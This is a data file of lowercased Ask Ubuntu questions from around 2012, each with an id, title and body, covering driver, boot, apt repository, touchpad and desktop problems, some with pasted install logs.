232575	when i switch to new user , i am unable to see the name in the prompt - why ?	i have just created a fresh installation of ubuntu 12.10 i have created a www-data user account . when i switch to www-data , i can not see www-data at the front of the prompt . what is the technical name to call that part of the prompt ? how can i make it appear for www-data ? see this for reference . as you can see , root has this . but not www-data
232577	how to share my mobile broadband connection via wifi	i am running ubuntu 12.04 on my laptop having wifi . i have an android tablet which has wifi support . i connect my laptop to the internet through mobile broadband ( reliance netconnect zte modem ) . i need to know how to share that connection to my tablet through wifi ...
232581	can someone tell me why my laptop takes so long to boot ? ( bootchart included )	title says it all . i have an asus laptop , the rest of the information you can find in the bootchart png . bootchart i would be very thankful is someone helped me .
232583	update manager does n't show any updates	i am running the update manager ( in ubuntu 12.04 ) for the first time in several months . when checking for updates , the update manager does n't find any , and returns the following error message : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . what do i do to kick it up and running properly again ?
232584	ubuntu 12.04 is stuck in lightdm login ( unity greeter )	the login and unity greeter is working . however , if i try to log-in - in a matter of seconds , it would return to the login screen . this happened when i tried to install a package and i restarted my computer . i also tried to uninstall , install , re-install , upgrade the lightdm , gdm and gnome . i installed/reinstalled ubuntu desktop/cinnamon/gnome3 as well , to try and see if it would work . but it is still the same and i can see the login-lockscreen . in a matter of seconds , i 'll be back to the log-in screen .
232586	realtek rtl8168/8111e wireless driver and ubuntu linux 12.10 64	first , merry christmas . i 'm a on a fresh ubuntu linux 12.10 - x64 . the wireless is not working at all . i downloaded realtek rtl8168/8111e driver for linux ( for kernel 3.x and 2.6.x and 2.4.x on realtek website . ) i ran ./autorun.sh as root . it failed to compile the driver for my kernel , but it removed the old default module , and then it fails to install the new 8168 module . i give a look to old post with older driver version : from twm-kd , on ask ubuntu and on wordpress . they all correct the problem if the r86 is well compiled , but here , it 's not happening and the compilation failed . i tried to install build-essential to be sure that the compilation would be ok . but it 's still not working . i ca n't get the r8168.ko file . and now the old drive has been removed so i ca n't connect to internet with the wired connection .
232587	optimization : ram cleaning and monitoring	is there any good tools for ram cleaning-purging ? i mean some daemon , that watch on ram and trying to purge some , if it reached the limit ? thanks !
232589	one more `` dell 17r touchpad '' question	i am trying to enable touchpad multitouch/scrolling in ubuntu 12.04 on my dell inspiron 5720 ( 17r ) . by default after installation it had the following settings ( xinput results ) : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:101b id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=14 [ slave pointer ( 2 ) ] so i followed this tutorial : http : //askubuntu.com/a/211755/113496 after installing the package stated there using install.sh here is installation log : konnigun @ konnigun-inspiron-5720 : /usr/src/psmouse-alps-dst-0.4 $ sudo bash ./install.sh main : driver source files by dave turvene . install script by garyf . main : removing previous versions of psmouse-alps-dst ... -- -- -- -- uninstall beginning -- -- -- -- module : psmouse version : alps-dst-0.4 kernel : 3.2.0-35-generic ( x86_64 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status : before uninstall , this module version was active on this kernel . psmouse.ko : - uninstallation - deleting from : /lib/modules/3.2.0-35-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... ... ... dkms : uninstall completed . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : alps-dst-0.4 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . main : building current driver from source files ... creating symlink /var/lib/dkms/psmouse/alps-dst-0.4/source - > /usr/src/psmouse-alps-dst-0.4 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.2.0-35-generic -c /lib/modules/3.2.0-35-generic/build m=/var/lib/dkms/psmouse/alps-dst-0.4/build/src psmouse.ko ... ... cleaning build area ... . dkms : build completed . main : installing the driver psmouse : running module version sanity check . - original module - installation - installing to /lib/modules/3.2.0-35-generic/updates/dkms/ depmod ... . dkms : install completed . rmmod psmouse , wait=no insmod /lib/modules/3.2.0-35-generic/updates/dkms/psmouse.ko main : done installing . go to system settings > mouse and touchpad to configure : - ) my touchpad got totally disabled . i mean , it doesnt work at all . but xinput now gives the following : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:101b id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=14 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=15 [ slave pointer ( 2 ) ] but touchpad does n't work . what can i do to fix it ? thanks alot = ) upd : after updating kernel from 3.2 to 3.5 it began working but in a very strange way : only scrolling and fn+f3 began to work . scrolling is working very strange . nothing else works ( i mean no two-finger scrolling and stuff like that ) . so basically i have a usual touchpad behavior now + scrolling .
232592	xubuntu 12.04 : wrong time ; change system language	i have recently installed xubuntu 12.04 on my rather old computer . most of the things are fine but i have a couple of problems . during the installation i was asked to choose a language and i chose english . however , now i want to change the language of the system ( not merely the keyboard layout ) such that all the setting appear in this other language . can i do that now after the installation ? the other problem is that the time shown up in the right is wrong . it is one hour ahead . the date , however , is correct . my location is also displayed correctly . i have an internet connection and expected that the time should be synchronized but it is not . any ideas how to fix that ?
232593	how to put app in `` what 's new '' section in software center	as the title says , i want to know how to put my new commercial app in `` what 's new '' section in software center . i published it 2 weeks ago and i still ca n't see it in `` what 's new '' section . so do i to do something to get my app on that section ?
232596	epson l210 linux driver	i bought epson l210 color printer and want to use it in ubuntu 12.04. when i connected that to pc , ubuntu configured a default printer as l210 series , but it does n't print ! it just show message `` printing completed '' but nothing ! how i can install and use this printer in linux ubuntu ? i searched internet , but no solution ! what 's your solution please help me . thank you
232598	quantal 12.10 - how to mount at startup with the new naming system ?	i have noticed that quantal now mounts each partition under a root like /media/ < user > since i need to auto-mount a partition at startup and this naming convention is totally new for me i was thinking that maybe there is a new way to do this correctly for ubuntu 12.10 and it 's time to discard fstab .
232599	how do i install ubuntu minimal inside windows using wubi ?	i believe in making my own ubuntu hence always use ubuntu-minimal as the base install . afterward , i follow apt-get to install whatever packages i want . i like it being minimal . this time i want to have an install inside windows 7 using wubi . how do i install ubuntu-minimal with wubi ; inside windows xp or 7 ? edit : but i am aware that it 's not directly possible to use wubi for minimal alternate install . i want to know how should wubi be modified so that it works with alternate install ? is there any alternative to wubi which works for alternate installer ?
232600	failed to fetch ppa error ( deluge )	how do i fix this error ? w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . the same error occur when i tried , sudo apt-get update & & sudo apt-get upgrade
232602	dual boot windows with ubuntu 12.10 uefi	i have recently bought a lenovo thinkpad edge with windows 8 preinstalled on it , and i installed ubuntu 12.10 i mostly followed the instructions under 'general instructions ' here : https : //help.ubuntu.com/community/uefi except i chose 'something else ' as an option when installing and then did n't create a new efi partition for ubuntu , only one swap and one ext4 as root . problem : when i turn on the computer and it enters grub menu ( i have grub2 ) these are the options : ubuntu ; advanced options for ubuntu ; windows 8 ( loader ) ( on /dev/sda4 ) ; system setup and ubuntu starts up normally , but when i choose windows i get : can not find command 'drivemap ' ; invalid efi file path however , when i alter the startup order in bios , options are : 1 ) ubuntu , 2 ) hard disk , 3 ) windows 8 setup , so my hard drive , or windows 8 setup be loaded first , windows 8 starts up normally ( without showing the grub menu ) i have found simmilar problems , and followed this instruction https : //wiki.archlinux.org/index.php/grub2 # multiboot_in_bios i found here grub errors during uefi dual boot for windows 8 ( ca n't find command 'drivemap ' ) though i did n't directly edit the grub.cfg file , i edited 40_custom file in /etc/grub.d . i had some errors in writting though ( they showed as i ran grub-mkconfig -o grub.cfg ) so i did n't go through with it ... i shall appretiate any help . mostly it concerns me that i can not yet really pinpoint the problem .
232606	stdout string manipulate , delete all after a word per line	my string look like this.. foo < ... ... ... ... ... ... ... ... ... ... bar < / ... ... ... ... ... ... ... ... ... . i want to pipe for output as foo bar delete all characters after a first < found each line .
232607	dual boot on galaxy note 2 ? ( android / ubuntu )	i want to buy a galaxy note 2 tablet/phone and i just wanted to know : how can i have both of these os 's on it at the same time ? if there is a way , how can i do it ? is there anyone who can help me ? ( i 'm not a linux programmer so the method would have to be for an ubuntu beginner . ) i 'm not talking about `` ubuntu for android '' ! i 'm thinking something like having meego and android on a nokia n9 , choosing the os while starting up ( dual boot ) . i want to run the full version of ubuntu along side the full version of android .
232610	what are files of wubi ?	i was messing up with my system files when i noticed some odd-looking files . just wanted to know what all files are put up by wubi installed and where ? here are few files i believe to exist : wubildr.mbr - in the root partition of windows ( c : \ ) . wubildr - in the root partition of windows ( c : \ ) . adds a line to boot.ini in windows ' root ( c : \wubildr.mbr = `` ubuntu '' ) directory named `` ubuntu '' - containing all the main files for ubuntu_os . what all files are added and what all windows files are modified by wubi ? can i manually remove these files to remove ubuntu if i do n't want to uninstall via wubi ? does wubi make any modifications to the windows boot loader aswell ?
232612	how to stop autostart of an installed program ?	i installed a certain software according to the following instruction set . begin -- how to install -- -- -- -- -- -- -- -- -- -- -- * you need login as root * run `` tar jxvf linux_install.tar.bz2 '' run `` ./install '' in terminal to install mobilepartner eg : # bash //install if you had installed this software in your system before , you will get a prompt : `` the software is exist , do you want overwrites ? ( [ y ] / [ n ] ) '' , enter `` y '' to overwrites or `` n '' to exit . if you do not had installed this software in your system before , you will get a prompt : `` please input the install path [ /usr/local/mobile_partner ] : '' . then you can input install path ( fullpath ) , or you may using the default path ( /usr/local/mobile_partner ) by press enter direct finish installing -- how to run -- -- -- -- -- -- -- -- -- -- -- -- -- * from shortcut in desktop run mobilepartner in your install path eg : # //mobilepartner plug in your device , it will run automatically end now , whenever i plug the dongle the software is autorun . can you explain me how to stop this autorunning .
232615	digital audio workstation : alternatives to logic pro or cubase for ubuntu ?	what do i use instead of cubase , logicpro , fl studio etc ? i would like to 1 ) connect midi devices ( like music keyboards ) via the usb port . this is very important . nothing that does n't do this would be suitable . 2 ) record audio from the line in ports . 3 ) edit , combine , add effects and process tracks to create music .
232618	apt problems : ca n't install gparted on ubuntu 11.04	i 'm trying to install gparted on my ubuntu sudo apt-get install gparted but i 'm getting the following output : root @ adam-desktop : /home/adam # sudo apt-get install gparted reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : dkms libvncserver0 patch use 'apt-get autoremove ' to remove them . suggested packages : xfsprogs reiserfsprogs reiser4progs jfsutils kpartx dmraid gpart the following new packages will be installed : gparted 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 1902 kb of archives . after this operation , 6746 kb of additional disk space will be used . warning : the following packages can not be authenticated ! gparted install these packages without verification [ y/n ] ? y err http : //archive.getdeb.net/ubuntu/ oneiric-getdeb/apps gparted amd64 0.12.1-1~getdeb1 could not connect to archive.getdeb.net:80 ( 209.105.191.78 ) . - connect ( 113 : no route to host ) failed to fetch http : //archive.getdeb.net/ubuntu/pool/apps/g/gparted/gparted_0.12.1-1~getdeb1_amd64.deb could not connect to archive.getdeb.net:80 ( 209.105.191.78 ) . - connect ( 113 : no route to host ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/main amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_main_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/restricted amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/universe amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_universe_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/multiverse amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/main i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_main_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/restricted i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/universe i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_universe_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric/multiverse i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/main amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/restricted amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/universe amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_universe_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/multiverse amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/main i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/restricted i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/universe i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_universe_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-updates/multiverse i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-updates_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/main amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_main_binary-amd64_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/restricted amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/universe amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_universe_binary-amd64_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/multiverse amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/main i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_main_binary-i386_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/restricted i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/universe i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_universe_binary-i386_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ oneiric-security/multiverse i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_oneiric-security_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/main amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_main_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/restricted amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/universe amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_universe_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/multiverse amd64 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/main i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_main_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/restricted i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/universe i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_universe_binary-i386_packages ) w : duplicate sources.list entry http : //pl.archive.ubuntu.com/ubuntu/ oneiric-backports/multiverse i386 packages ( /var/lib/apt/lists/pl.archive.ubuntu.com_ubuntu_dists_oneiric-backports_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //archive.getdeb.net/ubuntu/ oneiric-getdeb/apps amd64 packages ( /var/lib/apt/lists/archive.getdeb.net_ubuntu_dists_oneiric-getdeb_apps_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.getdeb.net/ubuntu/ oneiric-getdeb/apps i386 packages ( /var/lib/apt/lists/archive.getdeb.net_ubuntu_dists_oneiric-getdeb_apps_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? do you suspect what 's wrong ? update after i 've made : sudo rm -rf /etc/apt/sources.list.d/* sudo apt-get update & & sudo apt-get install gparted i 'm getting : root @ adam-desktop : /home/adam # sudo rm -rf /etc/apt/sources.list.d/* root @ adam-desktop : /home/adam # sudo apt-get update & & sudo apt-get install gparted ign http : //pl.archive.ubuntu.com oneiric inrelease ign http : //pl.archive.ubuntu.com oneiric-updates inrelease ign http : //pl.archive.ubuntu.com oneiric-backports inrelease hit http : //pl.archive.ubuntu.com oneiric release.gpg ign http : //security.ubuntu.com oneiric-security inrelease ign http : //www.bunkus.org ./ inrelease ign http : //archive.canonical.com oneiric inrelease ign http : //extras.ubuntu.com oneiric inrelease hit http : //pl.archive.ubuntu.com oneiric-updates release.gpg hit http : //pl.archive.ubuntu.com oneiric-backports release.gpg hit http : //security.ubuntu.com oneiric-security release.gpg hit http : //www.bunkus.org ./ release.gpg hit http : //pl.archive.ubuntu.com oneiric release hit http : //archive.canonical.com oneiric release.gpg hit http : //extras.ubuntu.com oneiric release.gpg hit http : //pl.archive.ubuntu.com oneiric-updates release hit http : //security.ubuntu.com oneiric-security release hit http : //www.bunkus.org ./ release hit http : //pl.archive.ubuntu.com oneiric-backports release hit http : //pl.archive.ubuntu.com oneiric/main sources hit http : //pl.archive.ubuntu.com oneiric/restricted sources hit http : //pl.archive.ubuntu.com oneiric/universe sources hit http : //pl.archive.ubuntu.com oneiric/multiverse sources hit http : //extras.ubuntu.com oneiric release hit http : //archive.canonical.com oneiric release ign http : //archive.getdeb.net oneiric-getdeb inrelease err http : //archive.getdeb.net oneiric-getdeb release.gpg unable to connect to archive.getdeb.net : http : ign http : //archive.getdeb.net oneiric-getdeb release ign http : //archive.getdeb.net oneiric-getdeb/apps sources/diffindex ign http : //archive.getdeb.net oneiric-getdeb/apps amd64 packages/diffindex ign http : //archive.getdeb.net oneiric-getdeb/apps i386 packages/diffindex ign http : //archive.getdeb.net oneiric-getdeb/apps translationindex err http : //archive.getdeb.net oneiric-getdeb/apps sources unable to connect to archive.getdeb.net : http : err http : //archive.getdeb.net oneiric-getdeb/apps amd64 packages unable to connect to archive.getdeb.net : http : err http : //archive.getdeb.net oneiric-getdeb/apps i386 packages unable to connect to archive.getdeb.net : http : err http : //archive.getdeb.net oneiric-getdeb/apps translation-en unable to connect to archive.getdeb.net : http : err http : //archive.getdeb.net oneiric-getdeb/apps translation-pl unable to connect to archive.getdeb.net : http : hit http : //pl.archive.ubuntu.com oneiric/main amd64 packages hit http : //pl.archive.ubuntu.com oneiric/restricted amd64 packages hit http : //pl.archive.ubuntu.com oneiric/universe amd64 packages hit http : //pl.archive.ubuntu.com oneiric/multiverse amd64 packages hit http : //pl.archive.ubuntu.com oneiric/main i386 packages hit http : //pl.archive.ubuntu.com oneiric/restricted i386 packages hit http : //pl.archive.ubuntu.com oneiric/universe i386 packages hit http : //pl.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //pl.archive.ubuntu.com oneiric/main translationindex hit http : //pl.archive.ubuntu.com oneiric/multiverse translationindex hit http : //pl.archive.ubuntu.com oneiric/restricted translationindex hit http : //www.bunkus.org ./ sources hit http : //extras.ubuntu.com oneiric/main sources hit http : //security.ubuntu.com oneiric-security/main sources hit http : //archive.canonical.com oneiric/partner sources hit http : //pl.archive.ubuntu.com oneiric/universe translationindex hit http : //pl.archive.ubuntu.com oneiric-updates/main sources hit http : //pl.archive.ubuntu.com oneiric-updates/restricted sources hit http : //pl.archive.ubuntu.com oneiric-updates/universe sources hit http : //pl.archive.ubuntu.com oneiric-updates/multiverse sources hit http : //pl.archive.ubuntu.com oneiric-updates/main amd64 packages hit http : //pl.archive.ubuntu.com oneiric-updates/restricted amd64 packages hit http : //pl.archive.ubuntu.com oneiric-updates/universe amd64 packages hit http : //pl.archive.ubuntu.com oneiric-updates/multiverse amd64 packages hit http : //pl.archive.ubuntu.com oneiric-updates/main i386 packages hit http : //pl.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //pl.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //www.bunkus.org ./ packages hit http : //pl.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //pl.archive.ubuntu.com oneiric-updates/main translationindex hit http : //pl.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //extras.ubuntu.com oneiric/main amd64 packages hit http : //extras.ubuntu.com oneiric/main i386 packages ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main amd64 packages hit http : //security.ubuntu.com oneiric-security/restricted amd64 packages hit http : //security.ubuntu.com oneiric-security/universe amd64 packages hit http : //security.ubuntu.com oneiric-security/multiverse amd64 packages hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //archive.canonical.com oneiric/partner amd64 packages hit http : //archive.canonical.com oneiric/partner i386 packages ign http : //archive.canonical.com oneiric/partner translationindex hit http : //pl.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //pl.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //pl.archive.ubuntu.com oneiric-backports/restricted sources hit http : //pl.archive.ubuntu.com oneiric-backports/main sources hit http : //pl.archive.ubuntu.com oneiric-backports/multiverse sources hit http : //pl.archive.ubuntu.com oneiric-backports/universe sources hit http : //pl.archive.ubuntu.com oneiric-backports/restricted amd64 packages hit http : //pl.archive.ubuntu.com oneiric-backports/main amd64 packages hit http : //pl.archive.ubuntu.com oneiric-backports/multiverse amd64 packages hit http : //pl.archive.ubuntu.com oneiric-backports/universe amd64 packages hit http : //pl.archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //pl.archive.ubuntu.com oneiric-backports/main i386 packages hit http : //pl.archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/main translationindex hit http : //security.ubuntu.com oneiric-security/multiverse translationindex hit http : //security.ubuntu.com oneiric-security/restricted translationindex hit http : //security.ubuntu.com oneiric-security/universe translationindex hit http : //pl.archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //pl.archive.ubuntu.com oneiric-backports/main translationindex hit http : //pl.archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //pl.archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //pl.archive.ubuntu.com oneiric-backports/universe translationindex hit http : //pl.archive.ubuntu.com oneiric/main translation-en hit http : //pl.archive.ubuntu.com oneiric/main translation-pl hit http : //pl.archive.ubuntu.com oneiric/multiverse translation-en hit http : //pl.archive.ubuntu.com oneiric/multiverse translation-pl hit http : //pl.archive.ubuntu.com oneiric/restricted translation-en hit http : //pl.archive.ubuntu.com oneiric/restricted translation-pl hit http : //pl.archive.ubuntu.com oneiric/universe translation-en hit http : //security.ubuntu.com oneiric-security/main translation-en hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //security.ubuntu.com oneiric-security/restricted translation-en hit http : //pl.archive.ubuntu.com oneiric/universe translation-pl hit http : //pl.archive.ubuntu.com oneiric-updates/main translation-en hit http : //pl.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //pl.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //pl.archive.ubuntu.com oneiric-updates/universe translation-en hit http : //pl.archive.ubuntu.com oneiric-backports/main translation-en hit http : //pl.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //pl.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //pl.archive.ubuntu.com oneiric-backports/universe translation-en hit http : //security.ubuntu.com oneiric-security/universe translation-en ign http : //www.bunkus.org ./ translation-en ign http : //www.bunkus.org ./ translation-pl ign http : //extras.ubuntu.com oneiric/main translation-en ign http : //archive.canonical.com oneiric/partner translation-en ign http : //extras.ubuntu.com oneiric/main translation-pl ign http : //archive.canonical.com oneiric/partner translation-pl w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/oneiric-getdeb/release.gpg unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/oneiric-getdeb/apps/source/sources unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/oneiric-getdeb/apps/binary-amd64/packages unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/oneiric-getdeb/apps/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/oneiric-getdeb/apps/i18n/translation-en unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/oneiric-getdeb/apps/i18n/translation-pl unable to connect to archive.getdeb.net : http : e : some index files failed to download . they have been ignored , or old ones used instead . root @ adam-desktop : /home/adam #
232621	why is unity a `` slow '' desktop environment ?	background first of all , this is not a question about opinions . i am assuming that we are talking about unity 3d and on a computer with decent graphics configuration . by `` desktop environment '' , i am assuming the most generally accepted definition of what a de means . i have seen lot of comparisons made and many people saying that unity is the slowest desktop environment on ubuntu ( compared to others like gnome , xfce , lxde etc. ) . i do n't know whether people took kde into consideration or not . question why is unity slow compared to other desktop environments ? is it just because of the high graphics used in unity or something else ? ( i do n't know what in unity makes it run slow. ) . what changes can be/ are being made to unity in order to make it faster/ improve its perfomance ?
232625	nvidia driver installation error	here i join the multitude of `` nvidia error '' questions , because i could n't find anything that helped . background : for some reason my drivers ( nvidia-experimental-310 ) stopped working , so i tried re-installing them . also , the same thing happened when i tried installing nvidia-current-updates . here 's the log : $ sudo apt-get install nvidia-experimental-310 reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : nvidia-current-updates the following new packages will be installed : nvidia-experimental-310 0 upgraded , 1 newly installed , 1 to remove and 0 not upgraded . need to get 0 b/37.4 mb of archives . after this operation , 1,758 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 221035 files and directories currently installed . ) removing nvidia-current-updates ... removing all dkms modules done . update-alternatives : using /usr/lib/i386-linux-gnu/mesa/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode info : disable nvidia-current-updates debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here debug : parsing /usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude debug : processing quirk thinkpad t420s debug : failure to match dell inc. with lenovo debug : quirk does n't match debug : processing quirk latitude e6530 debug : failure to match dell dxp051 with latitude e6530 debug : quirk does n't match update-initramfs : deferring update ( trigger activated ) processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for man-db ... processing triggers for initramfs-tools ... 